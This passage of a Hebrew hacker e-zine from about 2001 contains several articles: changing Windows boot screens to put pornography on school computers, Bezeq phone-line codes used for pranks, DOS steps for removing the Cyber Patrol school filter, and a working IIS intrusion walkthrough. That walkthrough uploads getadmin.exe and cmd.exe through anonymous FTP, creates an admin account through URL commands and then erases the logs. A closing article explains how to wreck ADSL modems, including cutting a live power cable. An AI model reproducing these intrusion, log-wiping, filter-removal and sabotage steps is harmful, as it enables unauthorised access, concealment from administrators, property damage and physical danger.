‫כי מיקרוסופט מצד אחד היו צריכים להחביא את הקובץ‪ ,‬מצד שני היו צריכים שיהיה באפשרותם‬
‫לגרום לו‬
‫שינויים גם אחרי שמערכת ההפעלה כבר הותקנה במחשב‪ ,‬בלי להתקין מחדש מדיסק אחר שבו‬
‫השינויים נעשו‬
‫בתיכנות עצמו‪ .‬אז הם שמרו את מסכי ההעפלה‪/‬כיבוי בתוך קובץ מערכת‪ ,‬דבר חכם כי למה לעזאזל‬
‫שמישהו‬
‫יישחק עם קובץ מערכת? זה בד"כ יהרוס את המחשב‪ ...‬מי בעולם ישחק עם קבצים כאלה?????‬
‫אנחנו‪ .‬טוב‪ ,‬אז תשתמשו בכלים שבתוכנת הגרפיקה שלכם כדי לשנות את מסך ההפעלה לאיך שאתם‬
‫רוצים שייראה‪.‬‬
‫אם אתם רוצים אתם גם יכולים לקחת תמונה אחרת (של מרילין מנסון לדוגמא‪ ,‬או אפילו של‬
‫עצמיכם)‪ ,‬ולשמור‬
‫אותה על שם הקובץ ‪c:\logo.sys‬‬
‫ואז בכל פעם שתפעילו את המחשב זה יופיע!!!‬
‫רק דבר אחד קטן‪ ,‬חשוב מאוד שהתמונה תהיה בגודל רוחב ‪ 320‬וגובה ‪ 400‬בפיקסלים‪ .‬גודל הקובץ‬
‫לא חשוב‬
‫אז גם אם זאת תמונה של מאה מגהבייט זה בסדר‪( .‬טוב אולי הגזמתי‪ ,‬אבל גודל הקובץ פה לא‬
‫עקרוני)‪.‬‬
‫אז אם התמונה שלכם לא בגודל המתאים פיתחו אותה עם העורך הגרפי ושנו את גודל התמונה ל ‪320‬‬
‫על ‪.400‬‬
‫מה עוד נשאר לנו? מסכי הכיבוי‪ .‬בתוך העורך הגרפי פיתחו את הקובץ‪:‬‬
‫‪c:\windows\logow.sys‬‬
‫כעת פיתחו את‪:‬‬
‫‪c:\windows\logos.sys‬‬
‫כל מה שהסברתי על הקובץ ‪ c:\logo.sys‬נכון גם לגבי הקבצים האלה‪ .‬זה אולי לא נראה לכם דבר‬
‫כזה‬
‫מגניב‪ ,‬אבל פעם הבאה שתגיעו לבית ספר‪ ,‬אם יש לכם שם מחשבים‪ ,‬אני חושב שתסכימו איתי שיהיה‬
‫די כייף‬
‫ומצחיק אם תחליפו את מסכי ההפעלה‪/‬כיבוי בתמונת פורנו או ‪!!!!school sucks‬‬
‫שלכם‪ ,‬גיהנום‬
‫מספרים שימושים‬
‫שלום לכולם!‬
‫הרבה זמן לא הייתה כתבה טובה על טלפוניה‪.‬‬

‫גם הכתבה הזאת עדיין לא משהו‪.‬‬
‫אבל לפחות זה משהו‪.‬‬
‫היום נלמד כמה "מספרים סודיים" לטלפון רגיל של בזק‪.‬‬

‫כמעט כולם מכירים את הקודים לפלאפונים של סלקום ‪ /‬אורנג'‪ /‬פלאפון‪,‬‬
‫אבל את הקודים לבזק כמעט אף אחד לא מכיר‪.‬‬
‫קוד ראשון‪.110 :‬‬

‫פשוט הרימו את הטלפון‪ ,‬וחייגו ‪ .110‬תענה לכם הקלטה שתקריא לכם את‪...‬‬
‫מספר הטלפון שלכם! למה זה שימושי לעזאזל‪ ,‬שאלתם? אז הנה‪:‬‬
‫‪ -‬אם יש לכם כמה קווים בבית‪ ,‬ואתם רוצים לבדוק אם שקע מסוים שייך למספר‬
‫אחד או לשני‪.‬‬
‫‪ -‬אם אתם אצל מישהו בבית‪ ,‬שמסרב לתת לכם את מספר הטלפון שלו‪.‬‬
‫‪ -‬אם אתם בטלפון ציבורי‪ ,‬ואתם רוצים לדעת מה המספר שלו כדי שיתקשרו‬
‫אליכם חזרה‪.‬‬
‫‪ -‬כל דבר אחר שעולה לכם בראש‪.‬‬
‫קוד נוסף‪.113 :‬‬

‫פשוט הרימו את הטלפון‪ ,‬וחייגו ‪ .113‬תשמעו כמה צפצופים‪ ,‬מהירים יותר‬
‫מצליל שיש אחרי שמחייגים ועד שעונים לכם‪ ,‬אבל איטי יותר מצליל תפוס‪.‬‬
‫אחרי כמה צפצופים כאלה‪ ,‬קו הטלפון שלכם פשוט ימות! טלפונים שלא מחוברים‬
‫לחשמל‪ ,‬יעני טלפונים פשוטים לא אלחוטיים ובלי מזכירה‪ ,‬יפסיקו בכלל לפעול‬
‫כאילו הוצאתם אותם מהשקע‪.‬‬
‫ועוד דבר‪ :‬זה זמני‪ ,‬רק בערך ‪ 2‬דקות‪ .‬אחרי ‪ 2‬דקות הקו יחזור‪ .‬אחרי שהוא‬
‫חוזר‪ ,‬בהתחלה הוא יעשה צפצופים כמו קודם‪ ,‬אבל אז תניחו את השפורפרת במקום‬
‫ותוך עוד איזה דקה זה יסתדר‪.‬‬
‫למה זה שימושי לעזאזל‪ ,‬שאלתם? אז הנה‪( :‬יש לי דז'ה וו עכשיו)‬
‫‪ -‬לעבוד על מישהו שאתם אצלו ‪ -‬לבקש ממנו לעשות שיחה‪ ,‬להרוג לו את הקו‪,‬‬
‫ואז להגיד לו שהקו לא עובד‪ ,‬מראים לו‪ ,‬והוא נכנס לפניקה!‬
‫עוד קוד‪.114 :‬‬

‫פשוט חייגו אותו‪ ,‬יהיה צליל המתנה של אחרי חיוג‪ ,‬ואז הוא פשוט יתחיל‬
‫לצפצף כמו משוגע‪ .‬למה זה טוב? זה לא‪.‬‬
‫הקוד הבא‪.112 :‬‬

‫אתם בטח יודעים‪ ,‬שמי שלא בחר מפעיל בין לאומי ‪ -‬החיוג באמצעות ‪ 00‬או ‪188‬‬
‫נחסם בשבילו‪ ,‬וכשהוא מנסה לחייג עם ‪ 00‬או ‪ 188‬אז הוא מקבל הודעה שהוא לא‬
‫יכול‪ .‬בעצם‪ ,‬הוא מופנה עם "עקוב אחרי" אל המספר ‪ ,112‬שם נמצאת ההודעה‪.‬‬
‫אז אם תחייגו ‪ 112‬תשמעו את ההודעה‪.‬‬
‫למה זה טוב לעזאזל? אפשר ללמוד להגיד "שירות החיוג באמצעות ‪ 00‬ו‪ 188-‬חסום"‬
‫באנגלית‪ ,‬ערבית‪ ,‬ורוסית‪.‬‬
‫טיפ קטן‪ :‬אם יש לכם טלפון ישן‪ ,‬שמחייג ב"מתקפים" (שלוחצים על ‪ ,5‬שומעים ‪5‬‬
‫תקתוקים) אז אתם לא יכולים להשתמש בכל מיני "שרותי טלפון" שמבקשים ממכם ללחוץ‬
‫על מספרים‪ ,‬כמו למשל טלמסרים למיניהם‪ .‬אז בחלק מהטלפונים האלה‪ ,‬אם תחייגו * לפני‬
‫המספר‪ ,‬הטלפון יחייג בחיוג צלילים ‪ -‬השיטה הנורמלית‪ ,‬שלכל מקש יש צליל‪.‬‬
‫אם יש לכם פלאפון‪ ,‬כנסו לספר טלפונים שלו והוסיפו שם חדש שקוראים לו‪:‬‬
‫‪umop apis dn‬‬
‫מה כתוב כאן? הפכו את הטלפון וגלו!‬
‫מנגינות בטלפון!‬
‫‪-------------------‬‬
‫‪3212333-222-333-3212333-22321-1‬‬
‫(איפה שיש "‪ "-‬לוחצים יותר זמן על המקש)‬
‫חייגו את המספר הזה ‪ -‬ותקשיבו בזמן שאתם מחייגים ‪ -‬ותשמעו את השיר "למרים טלה קטן"‪.‬‬
‫מי שלמד אי פעם נגינה‪ ,‬מכיר את השיר הזה כי זה השיר הראשון שלומדים כשלומדים נגינה‪.‬‬
‫‪ - 7486168‬חייגו את המספר הזה ותשמעו את ההתחלה של "ברני"! כדאי לחייג * או משהו כזה‬
‫קודם‪ ,‬כי מספר כזה באמת קיים ומישהו עשוי לענות לכם‪.‬‬
‫‪ - 1131222‬זה עולם קטן מאוד‪.‬‬
‫אז זהו בינתיים‬

‫ביי‪,‬‬
‫בנץ‪.‬‬
‫נטרול תוכנת סייבר‪-‬פורטל‬
‫היי!‬
‫כולם כאן בטח מכירים את התוכנה סייבר‪-‬פטרול‪ .‬זאת תוכנת פילטר לאתרי אינטרנט‪,‬‬
‫שהרבה בתי ספר משתמשים בה כדי שהתלמידים לא יגלשו לאתרי סקס וכו'‪.‬‬
‫הבעיה עם התוכנה הזאת‪ ,‬שאם מנסים למחוק אותה ידנית‪ ,‬היא חוסמת לחלוטין את המחשב‬
‫ולא נותנת לכם להפעיל אפילו את ווינדוס‪.‬‬
‫אז אם בבית ספר שלכם יש את סייבר‪-‬פטרול וחשקה נפשכם בכמה "אתרים אסורים"‪,‬‬
‫זו ממש לא בעיה לעקוף את סייבר‪-‬פטרול גם בלי הסיסמה‪.‬‬
‫אני יוצא מנקודת הנחה שאתם מכירים "קצת" את דוס‪ ,‬ואם לא‪ ,‬תפנו לגיליון מס' ‪ 2‬של‬
‫גיהינום‪,‬‬
‫הוא מסביר שם קצת על דוס‪.‬‬
‫‪----------------------------------------------------------------------------------‬‬
‫הערה חשובה‪ :‬תעשו את זה רק במחשבים של בית ספר או מחשב אחר שיש בו סייבר פטרול‬
‫ושממש‬
‫לא אכפת לכם מהמחשב‪ .‬למה? בגלל שיכול להיות שאם תטעו באות אחת תמחקו קובץ לא‬
‫נכון‬
‫ותהרסו את המחשב‪ .‬אבל הכל תעשו בשביל סקס‪ ,‬לא?‬
‫‪----------------------------------------------------------------------------------‬‬
‫כל מה שצריך לעשות זה‪:‬‬
‫‪ .1‬להפעיל את המחשב במצב דוס אמיתי (לא דוס מתוך ווינדוס)‪ ,‬כלומר להפעיל את‬
‫המחשב‬
‫מחדש‪ ,‬וללחוץ על אף‪ 8-‬עד שמופיע התפריט איתחול‪ .‬בוחרים שם את האפשרות‬
‫‪command prompt only‬‬
‫ואז מגיעים למצב דוס‪.‬‬
‫‪ .2‬נכנסים לספריה של ווינדוס‪ ,‬ומוחקים את הקובץ ‪ - atm.sys‬זהו הקובץ הסודי‬

‫שעושה‬
‫שאם תמחקו את התוכנה ווינדוס לא יעלה‪ .‬הקובץ אמור להיות מוגן ‪ -‬אבל את זה‬
‫עוקפים ככה‪:‬‬
‫‪attrib -r -s -h atm.sys‬‬
‫כמובן שאת זה עושים רק אחרי שנכנסתם לספריה של ווינדוס‪ .‬אחרי שהסרתם את‬
‫ההגנה‪ ,‬מחקו את‬
‫הקובץ ככה‪:‬‬
‫‪del atm.sys‬‬
‫‪ .3‬כותבים את זה שאתם עדיין בספריה של ווינדוס (תעשו יישור לשמאל)‪:‬‬

‫‪attrib -r -s -h system.386‬‬
‫‪attrib -r -s -h system\system.drv‬‬
‫‪copy system.386 system\system.drv‬‬
‫אם הוא שואל‪ ,‬תלחצו על כן‪.‬‬
‫‪del system.386‬‬
‫הסבר למה שעשינו פה‪ ,‬למי שרוצה לדעת‪ :‬הסרנו את הגנת המחיקה לשני קבצים‪.‬‬
‫את הקובץ סיסטם‪ 386.‬מהספריה של ווינדוס העתקנו "על" הקובץ סיסטם‪.‬דרב ואז‬
‫ומחקנו את הקובץ סיסטם‪.386.‬‬
‫‪ .4‬מוחקים לחלוטין את הספריה ‪c:\patrol‬‬
‫‪ .5‬מוחקים את הקבצים הבאים‪ ,‬בספריה של ווינדוס‪ .‬אם הם לא קיימים‪ ,‬זה בסדר‪.‬‬

‫פשוט זה תלוי איזה גרסה של סייברפטרול יש לכם‪.‬‬
‫‪ilc.exe‬‬
‫‪iic.exe‬‬
‫‪lic.exe‬‬
‫‪llc.exe‬‬
‫‪ic.exe‬‬
‫‪lc.exe‬‬
‫‪icfire.exe‬‬
‫‪lcfire.exe‬‬
‫‪icp.log‬‬
‫‪lcp.log‬‬
‫‪nt16.dll‬‬
‫‪ts.dll‬‬
‫‪ts16.dll‬‬
‫‪ts32.dll‬‬
‫‪tsnt.dll‬‬
‫‪tsntx.exe‬‬
‫‪usage.log‬‬
‫‪usage5.log‬‬
‫‪llc.exe‬‬
‫‪ .6‬מהספרייה סיסטם או סיסטם‪ 32‬שבתוך הספריה של ווינדוס תמחקו את הקובץ‬

‫‪ isystem.drv‬ו ‪lsystem.drv‬‬
‫עכשיו תעשו ריסט ותפעילו את ווינדוס כרגיל‪ .‬זהו! אין סייבר פטרול!‬
‫אם אתם רוצים לנקות ממש ממש‪ ,‬תמחקו מהרג'יסטרי את מה שמפעיל את סייבר פטרול‬
‫ככה‪:‬‬
‫‪ -‬תפעילו את הקובץ ‪regedit.exe‬‬
‫‪ -‬תמחקו את ה‪ registry keys-‬האלו‪:‬‬
‫‪hkey_local_machine\software\cyber patrol‬‬
‫‪hkey_local_machine\software\microsoft\windows\currentversion\run\cyber‬‬
‫‪patrol‬‬
‫‪hkey_local_machine\software\microsoft\windows\currentversion\uninstall\cyber‬‬
‫‪patrol‬‬
‫זהו! גמרנו! סייבר פטרול הלך ולא יחזור! לפחות עד שבית הספר יעלה על זה ויתקינו‬
‫אותו‬
‫עוד פעם‪ .‬ואתם תמחקו אותו עוד פעם‪ .‬והם יעלו על זה ויתקינו אותו עוד פעם‪ .‬ואתם‬
‫תמחקו‪.‬‬
‫וככה עד שתסיימו את בית ספר‪ .‬או שלא‪.‬‬
‫טוב אז ביי עד לפעם האחרונה‪,‬‬

‫בנץ‪.‬‬
‫פריצה לאתרים ‪ -‬דוגמאות לאקספלויטים‬
‫‪hello motherfucker‬‬
‫מה שלומכם? ‪9:‬‬

‫בטח ראיתם שכבר הרבההההה זמן לא היו כתבות ממני וזה מכמה סיבות‪:‬‬
‫א‪ .‬סייממממתתתתייייי בבבבייייתתתתת ספפפפפררררררררר!!!!!‬
‫אז הייתי עסוקה בלחגוג‪( .‬הקפצנו קולה ודרסנו זקנות)‬
‫ב‪ .‬אני עסוקה בלהביא לכם אותה ב ה‪-‬כתבה ה‪-‬פ‪33‬ה אבל אני עוד תקועה שם (גיהנום האני‪ ,‬אל‬
‫תחכה‪ ,‬אני אצטרך ללמוד ספר שלם על ‪ asp‬בשביל זה‪)..‬‬
‫ג‪ .‬כתבתי שירים כל היום (סתם‪ ,‬כולה ‪ <- )2‬שייקספיר ממכר‪.‬‬
‫ד‪ .‬לא בא לי עליכם‪.‬‬
‫שיא עולמי‪ :‬תגידו קרה פעם שמישהו התקשר אליכם ולא עניתם ואחרי פחות מחצי שעה ראיתם ‪39‬‬
‫שיחות שלא נענו? (זיפ בטח מחייך עכשיו)‪.‬‬
‫ועכשיו קצת חדשות‪ :‬זוכרים שאמרתי לכם לפני שנים על כנס ההאקרים השנה? אז זהווו שיש פגישת‬
‫מארגנים בשבוע הבא (תאכלו את הלב יהיה לי חולצה של מארגן) אז מאוד בקרוב אני אהיה חכמה‬
‫יותר להגיד לכם מה חדש‪ .‬בטח עד שהכתבה הזאת תתפרסם כבר אני אדע מה קורה‪.‬‬
‫והיום ילדים‪ ,‬נלמד שיטה לפריצת אתרים! ממש ככה‪ .‬אתם תלמדו היום איך לפרוץ מערכות פגיעות‬
‫עם מנהלים טפשים ששכחו לחסום גישה לתיקייה בשם ‪!!cgi-bin‬‬
‫זוהי הכתבה הראשונה בסדרת כתבות על ‪:iis‬‬
‫(ייתכן שיקח לי עוד זמן לפרסם את השאר‪ ,‬אז אנא האזרו בשבלולנות)‬
‫בכתבות הבאות בנושא אני אסביר יותר לעומק מה זה ‪ iis‬ואיך היא עובדת‪ ,‬ולכן לצורך העניין‬
‫הסברתי כאן ממש בכלליות‪ .‬אז אני גאה להציג את‪...‬‬
‫========================================================‬
‫‪iis hacking no.1 : how to hack through the cgi-bin‬‬
‫========================================================‬
‫כן כן‪ ,‬ממש להשיג ‪...admin rights‬‬
‫אז מה זה שרת המריץ ‪?iis‬‬

‫זוהי מערכת המשתמשת ב ‪ )iis )internet infrmation server‬שזה שרת אינטרנט ותוכנות לניהול‬
‫האינטרנט‪ .‬של מייקרוסופט‪ .‬אוווו‪ ...‬ואתם יודעים מה זה אומר‪...‬‬
‫לדוגמה אתם חוקרים אתר של חברה מסויימת‪ .‬איך תדעו אם הוא משתמש ב ‪ ?iis‬לרוב ניתן להשיג‬
‫את זה דרך פורט ‪ .80‬התבוננו בהודעת השגיאה שתקבלו אם תקישו ‪ get http‬או סתם שטויות‪:‬‬
‫‪http/1.1 400 bad request‬‬
‫‪server: microsoft-iis/4.0‬‬
‫‪date: wed, 30 may 2001 20:47:31 gmt‬‬
‫‪content-length: 407‬‬
‫‪content-type: text/html‬‬
‫השרת מודיע לנו שהוא מריץ ‪.iis‬‬
‫הפריצה‪:‬‬
‫טוב‪ ...‬נסו את ה‪ .ftp‬פורט ‪ .21‬אם אין לכם חשבון על אותו שרת‪ ,‬נסו להכנס בשם‬
‫‪anonymous‬‬
‫(בחלון דוס‪ ,‬הקלידו‪:‬‬
‫‪ftp www.victim.com‬‬
‫המחשב יגיב‪:‬‬
‫‪.connected to www.company.com‬‬
‫‪.)victim microsoft ftp service )version 3.0 220‬‬
‫((‪user : )www.comapny.com:)none‬‬
‫הקלידו‪:‬‬
‫‪anonymous‬‬
‫השרת יבקש כתובת אימייל בתור סיסמה‪ .‬המציאו משהו‪.‬‬
‫‪) password gehenom@underground.com‬‬
‫כעת‪ ,‬שימו לב שהשרת אמר את השם שלו‪ .)victim microsoft ftp service )version 3.0 :‬שם השרת‬
‫הוא ‪ .victim‬זה אומר‪ ,‬שבמערכת ה ‪ iis‬חשבון ה ‪ anonymous‬יקרא ‪ .iusr_victim‬נזכור זאת לשימוש‬
‫מאוחר יותר‪.‬‬
‫השיטה הזאת תעבוד אך ורק אם יש לכם הרשאה להעלות קבצים לספריה ‪ .cgi-bin‬נסו להכנס‬
‫לספריה זו באמצעות‬
‫‪( cd‬לחצו על אנטר)‬
‫‪. cgi-bin‬‬
‫(כדי לבדוק באיזה ספריה אתם‪ ,‬הפקודה‪.)pwd :‬‬
‫נניח שהצלחתם להכנס לתיקיה בלי ‪ ,access denied‬נסו להעלות קובץ לשרת‪ .‬צרו קובץ טקסט ריק‬
‫לדוגמה ונסו להעלות אותו באמצעות הפקודה‪:‬‬
‫‪put c:\mytext.txt‬‬
‫אם הפקודה תתבצע כראוי תראו שהשרת מקבל את הקובץ ומאשר את הקבלה‪port command 200 :‬‬
‫‪.successful‬‬
‫הקלידו‬
‫‪dir‬‬
‫כדי לראות את רשימת הקבצים‪.‬‬
‫הצלחתם להעלות קובץ ל ‪ ?cgi-bin‬אתם מסודרים‪.‬‬
‫כעת‪ ,‬לאלה מכם שמשתמשים ב ‪ ,nt‬בדקו אם יש לכם את הקבצים ‪ cmd.exe, gasys.dll‬ו‬
‫‪getadmin.exe‬‬
‫לאלה מכם שלא על ‪ nt‬או לאלה מכם שכן אבל אין להם את הקבצים הנ"ל‪ ,‬לכו למנוע החיפוש החביב‬
‫עליכם והשיגו את הקבצים‪( .‬או בקשו ממשתמשי ‪ nt‬את ‪ .)cmd.exe, gasys.dll‬בכל מקרה‪ ,‬את‬
‫‪ getadmin.exe‬לא קשה להשיג‪.‬‬
‫ועכשיווו‪ ...‬פתחו את ה ‪ ftp‬שוב‪ ,‬והקלידו‬
‫‪( binary‬פתיחת התקשרות לקבלת קובץ בינארי)‬
‫ואז‬
‫‪put cmd.exe‬‬
‫‪put gasys.dll‬‬
‫‪put getadmin.exe‬‬
‫סגרו את ה ‪.ftp‬‬
‫כעת‪ ,‬פתחו את הדפדפן שלכם והקלידו‪:‬‬
‫‪http://www.company.com/cgi-bin/getadmin.exe?iusr_victim‬‬
‫הדפדפן יענה‪:‬‬
‫‪cgi error‬‬
‫‪.the specified cgi application misbehaved by not returning a complete set of http headers‬‬
‫אתם יודעים מה זה אומר? שכעת למשתמש ‪ iusr_victim‬יש הרשאות של משתמש על! (אדמין)‪ .‬בואו‬
‫ניצור חשבון חדש בשם ‪ gehenom‬שסיסמתו תהיה‪ .underground :‬שוב בחלון הדפדפן הקלידו‬
‫‪http://www.company.com/cgi-‬‬
‫‪bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20gehenom%20underground%20/‬‬
‫‪add‬‬
‫וכדי לתת גם לחשבון הזה זכויות של משתמש על‪,‬‬
‫‪http://www.company.com/cgi-bin/getadmin.exe?gehenom‬‬
‫כעת התחברו שוב ל ‪ ,ftp‬אבל הפעם בתור המשתמש ‪ gehenom‬והסיסמה ‪.password‬‬
‫זהו! עכשיו אתם שולטים במערכת! אם אתם משתמשים ב ‪ nt‬אתם יכולים להעזר ב ‪user manager‬‬
‫וב ‪ server manager‬כדי לשלוט על המערכת‪.‬‬
‫קחו כוס קולה‪ ,‬תחגגו את הרגע‪ ,‬ואז תעשו מה שתמיד חלמתם לעשות על אותה מערכת (אני לא‬
‫ממליצה למחוק קבצים‪ ,‬זה סתם מנייאקי)‬
‫ניקיון‪:‬‬
‫אל תשכחו להכנס לכונן ‪( c$‬מוסתר) לספריה ‪ winnt\system32\logfiles‬ולעדכן את הלוג של אותו‬
‫יום‪ ,‬זאת אומרת למחוק כל זכר לכך שהייתם שם‪ .‬שמרו את הלוג החדש‪ .‬אם זה עושה לכם בעיות‪,‬‬
‫לפחות שנו את התאריך של הלוג כדי לא להחשיד‪:‬‬
‫‪http://www.company.com/cgi-bin/cmd.exe?/c%20date%2002/02/98‬‬
‫אל תשכחו להוריד מהאנונימוס את הרשאות משתמש העל‪ ,‬ולמחוק את החשבון שיצרתם (‬
‫‪ )gehenom‬ואת הקבצים שהעלתם לשרת‬
‫(‪dele cmd.exe‬‬
‫‪dele gasys.dll‬‬
‫‪)dele getadmin.exe‬‬
‫בדקו אם אין עוד לוגים ששכחתם לעדכן‪ ,‬ועזבו את השרת‪.‬‬
‫יש לציין כי השיטה עובדת *רק* במקרה שיש גישה ל ‪ cgi-bin‬ורשות להעלות קבצים‪ ,‬וזה מאוד‬
‫מאוד נדיר למצוא שרת כ"כ פגיע‪.‬‬
‫למה זה עובד?‬
‫כי ב ‪ iis‬ספריית ה ‪ cgi-bin‬משמשת לאחסון סקריפטים שהמשתמש יכול להריץ‪ .‬אם העליתם לשם‬
‫אקספלוייט (במקרה שלנו ‪ )getadmin.exe‬השרת יכול להריץ אותו דרך שורת הכתובת (ז"א דרך‬
‫הדפדפן)‪ .‬בניגוד לספריות אחרות על השרת‪ ,‬קובץ המועלה ל ‪ cgi-bin‬רץ על השרת *עצמו* ולא על‬
‫המחשב שלכם! לכן כאשר מעלים לשם אקספלוייט הוא ירוץ על המערכת עצמה ויפרוץ אותה‪.‬‬
‫קרדיטים‪:‬‬
‫את השיטה הזאת למדתי מקובץ בשם ‪ hacking-nt‬שמאוד קל למצוא על האינטרנט‬
‫למעוניינים חפשו ‪ ,hacking-nt‬זהו הקובץ שמתחיל במילים‪:‬‬
‫‪.johnny hacker has a windows nt server at home‬‬
‫חכו לעוד כתבות בעניין‪ ,‬אבל תסלחו לי אם זה יקח קצת זמן‬

‫‪drink disgusting cherry cokes‬‬
‫‪and happy hacking‬‬
‫בלאדי‪.‬‬
‫איך לשפר ביצועים ועד איך לחבל במודמים‬
‫שירות וואו של בזק מסופק ב ‪ 80‬אחוז מהערים בארץ ישראל‪.‬‬

‫כאשר אתם מזמינים את השירות אתה נתקעים בשבועיים בממוצע המתנה להתקנה ואז מתבאסים‬
‫(לא בכל המקרים‪).‬‬
‫שירות וואו של בזק הוא עובד דרך ‪.adsl‬‬
‫‪ adsl‬הוא חיבור לאינטרנט במהירות יותר גבוהה ממה שהייתם רגילים לו‪.‬‬
‫אם מישהו אמר לכם שזה לא שווה את הכסף שזה עולה (וזה די יקר) הוא משקר אבל כמו כן‪,‬‬
‫מי שאמר לכם שזה שווה הוא כמו כן שקרן‪.‬‬
‫בזק מחלקת את הארץ לשני חלקים‪ ,‬חלק אשר מקבל את מודם האלקטל וחלק את מודם האורכית‪.‬‬
‫קצת על כל מודם וביצועיו ואיך להרוס אותו טוטאלית‪:‬‬
‫מודם אלקטל של בזק ‪:‬‬
‫‪-------------------------------------------------------------------------------------‬‬
‫מודם מכוער וארוך בצבע שחור‪.‬‬
‫בזק אומרת שכל המודמים מוגבלים בקיבולת שלהם אבל מודם אלטקל מוכיח את טענתם‪.‬‬
‫כל מי שאני מכיר שיש לו אלקטל מתבאס מת ואפילו מתנתק מהשירות‪.‬‬
‫בממוצע מודם אלקטל יביא לכם את הביצועים הבאים‪:‬‬
‫‪: test‬‬
‫*‪)246kb/s )down‬‬
‫*‪)11kb/s )up‬‬
‫אבל כמובן יש דרכים לשפר את הביצועים‪.‬‬
‫‪ .1‬לעבור עיר ואז לקבל מודם אחר‪.‬‬
‫‪ .2‬לקנות ממישהו מודם אורכית ולעשות את ההתקנה ולהיזהר שבזק לא יגלו‪.‬‬
‫‪ .3‬להכין קובץ ‪ reg‬חדש ולכתוב בפנים ‪:‬‬
‫‪------------------------------------------------------------------------------------‬‬
‫‪regedit4‬‬
‫]‪[hkey_local_machine\system\currentcontrolset\services\vxd\mstcp‬‬
‫"‪"defaultrcvwindow"="64245‬‬
‫‪------------------------------------------------------------------------------------‬‬
‫הקובץ הזה בעצם משנה כמה דברים ברג'יסטי אבל אני לא אפרט כי זה לא נחוץ לנו‪.‬‬
‫אתם יכולים לשחק עם הטווח אבל תיזהרו לא לקפוץ למרחקים שלא תחזרו מהם‪.‬‬
‫תלכו מקסימום ‪ 12‬מספרים קדימה או אחורה‪.‬‬
‫‪.64257 <- 64245 -> 64233‬‬
‫אנרכיה ‪ -‬אם ברצונכם להרוס את המודם טוטאלית אבל בדרך מקורית‪...‬‬
‫מאחורי המודם יש שם כפתור אשר מאפס את המודם (‪ )restart‬אשר עליו תלחצו עם מוט‪ ,‬קיסם וכו'‪.‬‬
‫שימו שם את הפריט שאיתו אתם לוחצים והדביקו אם צלוטייפ (או כל חומר דביק אחר)‪.‬‬
‫מה קורה עכשיו ‪ :‬האיפוס ימשיך הרבה זמן והמודם יתחיל להתחרפן‪,‬‬
‫תהיה הפסקת חשמל קטנה אבל אתם כולה מחזירים את הפלאג בארון החשמל למקום‪.‬‬
‫אל תשכחו לוודאות שבזמן שאתם עושים את הנ"ל המודם מחובר לחשמל !!!!!!‬
‫(אבל שלא יהיה מחובר למחשב‪ ,‬מומלץ‪ ,‬כי זה יכול גם אתם יודעים‪ ,‬לשרוף משהו בבלוק)‪.‬‬
‫‪-------------------------------------------------------------------------------------‬‬
‫מודם אורכית של בזק‪:‬‬
‫‪-------------------‬‬
‫מודם קטן ויפיפיה אשר לא מוגבל‪.‬‬
‫אנשים עם מודם כזה לא יורדים מהמאה חמישים קיי בהורדה ומעלים מהירות נורמלית‪.‬‬
‫ממוצע של מודם אורכית ‪:‬‬
‫‪: test‬‬
‫*‪)341kb/s )down‬‬
‫*‪)102kb/s )up‬‬
‫אבל גם את זה אפשר לשפר‪.‬‬
‫מה עושים ‪ :‬יש שני שיטות שאני מכיר והם הכי טובות‪:‬‬
‫‪.1‬‬
‫‪.go to network , press on proporties‬‬
‫‪.choose dial-up adapter, press on proporties‬‬
‫‪.go to advanced, go to ip packte size‬‬
‫‪.change the value from automatic to ------ >> medium‬‬
‫‪ .2‬פתחו קובץ ‪ reg‬חדש וכתוב שם‪:‬‬
‫‪------------------------------------------------------------------------------------‬‬
‫]‪[hkey_local_machine\system\currentcontrolset\services\vxd\mstcp‬‬
‫"‪"defaultrcvwindow"="64249‬‬
‫‪------------------------------------------------------------------------------------‬‬
‫אנרכיה ‪:‬‬
‫דרכים להרוס מודם אורכית‪:‬‬
‫על מודם האורכית הנחמד שלנו אין כפתורים לאיפוס ובלה בלה‪.‬‬
‫אז פשוט קחו את החוט אשר יוצא מהמודם לחשמל‪ ,‬פתחו אותו אם סכין‪ ,‬חשפו את החוטים בפנים‪,‬‬
‫תחכתכו אחד מהחוטים אשר תמצאו בפנים וחברו שוב לחשמל‪ ,‬אני לא מספר מה קורה‪ ,‬אם אתם‬
‫רוצים לדעת ‪,‬‬
‫תנסו‪ ,‬למרות שאני לא ממליץ בחום !!!‬
‫‪------------------------------------------------------------------------------------‬‬
‫הסברים אחרונים למאותגרים שלא הבינו מה עושים‪.‬‬
‫* לאחר שכותבים קובץ ‪ ,reg‬שומרים אותו ‪ ,‬אז מפעילים אותו ‪ ,‬הוא ישאל אתכם בלה בלה ואז‬
‫אומרים "כן"‪.‬‬
‫** מודם אלקטל לא תמיד יהיה מסריח וגם אורכית לא תמיד יהיה טוב ‪ ,‬יש עוד פרמטרים אשר‬
‫קובעים מהירות‪:‬‬
‫‪ .1‬המרחק מהמרכזיה לבית שלכם‪.‬‬
‫‪ .2‬החוטים של הטלפון‪ ,‬חדשים ישנים סדוקים גמורים או מה‪ ...‬ככל שיותר חדשים יותר טוב‪.‬‬
‫*** עכשיו שימו לב השיטות של שיפור הביצועים היא לא תמיד תעבוד‪ ,‬זה תלוי במרכזיה אשר בעיר‬
‫שלכם‬
‫אם היא ישנה יחסית לשירות אז זה יעבוד אבל אם היא חדשה אז תשכחו מזה !!!!‬
‫זהו ‪ ,‬רק שתדעו בזק הם בני זונות אשר גונבים כספים ואני ממליץ‪:‬‬
‫"רק למי שיש כסף בצד שיתחבר‪ ,‬כי לאנשים יותר פשוטים עדיך להוציא את הכסף על דברים אחרים‪,‬‬
‫כמוני ‪.))))))))))):‬‬
‫‪ -------------‬עודכן ביום חמישי‪ ------------- 22/02/01 ,‬ע"י פירסינג ‪-------------------------‬‬
‫זוכרים שכתבתי למעלה שעושים למודם אורכית (‪ )restart‬ריבוט ע"י הוצאה מהחשמל ! אל תעשו את‬
‫זה‪.‬‬
‫שמועות הגיעו לאוזני ממקורות פנימיים בחברה אשר מייצרת את המודמים שכשאר מוציאים את‬
‫הכבל‪,‬‬
‫של המודם מהחשמל הוא פוגע בפינים של המודם (‪ .)pin2‬ולאחר הרבה פעמים יכול לגרום לשריפה של‬
‫המודם‪.‬‬
‫אז כמובן אני פה מביא לכם שיטה ממש טובה לאתחל את המודן בלי להוציא אותו מהחשמל‪.‬‬
‫עושים ככה‬
‫‪start -> run -> telnet 10.0.0.138‬‬
‫יפתח לכם טרמינל שהוא בעצם למודם‪.‬‬
